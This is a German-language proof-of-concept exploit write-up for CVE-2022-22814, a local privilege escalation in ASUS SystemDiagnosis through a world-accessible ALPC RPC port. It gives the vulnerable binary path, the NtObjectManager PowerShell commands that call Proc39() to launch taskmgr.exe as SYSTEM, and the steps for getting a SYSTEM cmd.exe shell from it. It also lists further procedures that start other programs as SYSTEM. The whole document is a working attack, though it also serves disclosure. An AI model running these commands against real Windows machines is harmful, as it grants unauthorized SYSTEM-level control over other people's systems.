
Proof-of-Concept-Exploit für CVE-2022-22814, der eine lokale Rechteausweitung unter Windows über eine angreifbare ASUS SystemDiagnosis ALPC RPC-Schnittstelle demonstriert.
Privilegieneskalation - AsusSystemDiagnosis.exe - Proc39()
Full Path: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
Problem:
Der ALPC-Port \RPC Control\ASHWTestServer, der von AsusSystemDiagnosis.exe bereitgestellt wird, ist für jeden Benutzer vollständig zugänglich. Ein Aufruf von Proc39() über RPC über diesen Port startet einen taskmgr.exe-Prozess als SYSTEM in der aktuellen Benutzersitzung.
Ausnutzung:
Mithilfe des NtObjectManager RPC-Tools von Project Zero von https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (stellen Sie sicher, dass Sie die kompilierte Version verwenden) kann der angreifbare RPC-Port verbunden werden, woraufhin Proc39() aufgerufen werden kann. Sobald der SYSTEM taskmgr.exe-Prozess gestartet ist, kann eine cmd.exe-Shell mithilfe der Funktion "Neuen Task ausführen" über das Kontextmenü erstellt werden: Datei > Neuen Task ausführen > cmd.exe.
NtObjectManager:
$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
$client = get-rpcclient $server
$client.connect()
$client.Proc39()
Privilegieneskalation - AsusSystemDiagnosis.exe - Proc40()
Gleiches wie oben, startet jedoch mmc.exe als System. Sie können entweder einen neuen Task erstellen oder die Browse-Funktion verwenden, um ein explorer.exe-Fenster zu öffnen und cmd.exe über die Adressleiste auszuführen.
Zusätzliche Hinweise:
Proc53() - startet systemreset.exe als SYSTEM Proc54() - startet RecoveryDrive.exe als SYSTEM